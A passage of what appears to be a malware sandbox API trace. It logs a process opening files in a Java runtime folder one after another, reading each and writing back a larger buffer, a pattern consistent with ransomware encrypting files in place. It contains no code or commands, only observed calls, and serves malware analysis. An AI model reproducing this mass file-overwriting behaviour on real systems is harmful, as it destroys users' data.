[0118.931] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.931] WriteFile (in: hFile=0x20c, lpBuffer=0x289f9a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x289f9a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0118.932] CloseHandle (hObject=0x20c) returned 1 [0118.932] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\pack200.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\pack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.933] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.934] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3da8 [0118.934] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.934] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.934] ReleaseMutex (hMutex=0x168) returned 1 [0118.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pack200.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pack200.exe", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pack200.exe", lpUsedDefaultChar=0x0) returned 11 [0118.934] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.943] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2da8 [0118.943] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0118.948] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2da8 [0118.948] WriteFile (in: hFile=0x20c, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0118.949] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0118.949] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0118.950] CloseHandle (hObject=0x20c) returned 1 [0118.950] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT" (normalized: "c:\\program files (x86)\\java\\jre7\\copyright"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0118.951] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.951] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xd51 [0118.951] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0118.951] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.951] ReleaseMutex (hMutex=0x168) returned 1 [0118.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COPYRIGHT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0118.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COPYRIGHT", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COPYRIGHT", lpUsedDefaultChar=0x0) returned 9 [0118.951] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xd51, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf2bc*=0xd51, lpOverlapped=0x0) returned 1 [0118.957] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0118.957] WriteFile (in: hFile=0x20c, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0x12d9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x12d9, lpOverlapped=0x0) returned 1 [0118.957] CloseHandle (hObject=0x20c) returned 1 [0118.958] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0119.719] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0119.719] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x414 [0119.719] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0119.719] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.719] ReleaseMutex (hMutex=0x168) returned 1 [0119.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LINEAR_RGB.pf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LINEAR_RGB.pf", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LINEAR_RGB.pf", lpUsedDefaultChar=0x0) returned 13 [0119.720] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x414, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2fdf2bc*=0x414, lpOverlapped=0x0) returned 1 [0119.722] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0119.722] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x99c, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x99c, lpOverlapped=0x0) returned 1 [0124.201] CloseHandle (hObject=0x1d8) returned 1 [0124.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0124.202] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0124.202] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xcea [0124.202] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0124.202] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0124.202] ReleaseMutex (hMutex=0x168) returned 1 [0124.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_de.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0124.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_de.properties", cchWideChar=22, lpMultiByteStr=0x1f8867c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_de.properties", lpUsedDefaultChar=0x0) returned 22 [0124.202] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xcea, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf2bc*=0xcea, lpOverlapped=0x0) returned 1 [0124.261] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0124.261] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea96b8*, nNumberOfBytesToWrite=0x1272, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea96b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1272, lpOverlapped=0x0) returned 1 [0128.145] CloseHandle (hObject=0x1d8) returned 1 [0128.146] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_cn.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0128.169] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.169] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xfe8 [0128.169] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.169] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.170] ReleaseMutex (hMutex=0x168) returned 1 [0128.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_CN.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0128.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_zh_CN.properties", cchWideChar=25, lpMultiByteStr=0x1f8fcfc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_zh_CN.properties", lpUsedDefaultChar=0x0) returned 25 [0128.170] ReadFile (in: hFile=0x1d8, lpBuffer=0x2668268, nNumberOfBytesToRead=0xfe8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf2bc*=0xfe8, lpOverlapped=0x0) returned 1 [0128.173] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0128.174] WriteFile (in: hFile=0x1d8, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1570, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1570, lpOverlapped=0x0) returned 1 [0128.174] CloseHandle (hObject=0x1d8) returned 1 [0128.175] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\localedata.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\localedata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0128.176] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.176] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xf790d [0128.176] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.177] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.177] ReleaseMutex (hMutex=0x168) returned 1 [0128.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="localedata.jar", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0128.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="localedata.jar", cchWideChar=14, lpMultiByteStr=0x1f733cc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="localedata.jar", lpUsedDefaultChar=0x0) returned 14 [0128.177] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0128.179] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0128.197] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xf690d [0128.197] ReadFile (in: hFile=0x1d8, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0128.199] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xf690d [0128.199] WriteFile (in: hFile=0x1d8, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.200] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0128.200] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.201] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.201] CloseHandle (hObject=0x1d8) returned 1 [0128.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.bfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0128.202] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.202] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe56 [0128.203] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.203] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.203] ReleaseMutex (hMutex=0x168) returned 1 [0128.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.bfc", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0128.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="fontconfig.bfc", cchWideChar=14, lpMultiByteStr=0x1f7344c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontconfig.bfc", lpUsedDefaultChar=0x0) returned 14 [0128.203] ReadFile (in: hFile=0x1d8, lpBuffer=0x2668268, nNumberOfBytesToRead=0xe56, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2fdf2bc*=0xe56, lpOverlapped=0x0) returned 1 [0128.686] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0128.688] WriteFile (in: hFile=0x1d8, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x13de, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf2d0*=0x13de, lpOverlapped=0x0) returned 1 [0128.709] CloseHandle (hObject=0x1d8) returned 1 [0128.729] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterbold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0128.730] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.730] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x39254 [0128.730] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.730] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.730] ReleaseMutex (hMutex=0x168) returned 1 [0128.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterBold.ttf", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0128.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterBold.ttf", cchWideChar=24, lpMultiByteStr=0x1f8fd5c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaTypewriterBold.ttf", lpUsedDefaultChar=0x0) returned 24 [0128.730] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0128.733] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x38254 [0128.733] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0128.734] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x38254 [0128.734] WriteFile (in: hFile=0x1d8, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.735] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0128.735] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0128.735] CloseHandle (hObject=0x1d8) returned 1 [0128.735] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0128.736] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.736] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x99 [0128.736] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0128.737] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.737] ReleaseMutex (hMutex=0x168) returned 1 [0128.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0128.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkNoDrop32x32.gif", cchWideChar=25, lpMultiByteStr=0x1f8fd5c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_LinkNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 25 [0128.737] ReadFile (in: hFile=0x1d8, lpBuffer=0x262f5b8, nNumberOfBytesToRead=0x99, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x262f5b8*, lpNumberOfBytesRead=0x2fdf2bc*=0x99, lpOverlapped=0x0) returned 1 [0128.738] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0128.738] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x621, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x621, lpOverlapped=0x0) returned 1 [0128.739] CloseHandle (hObject=0x1d8) returned 1 [0128.739] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 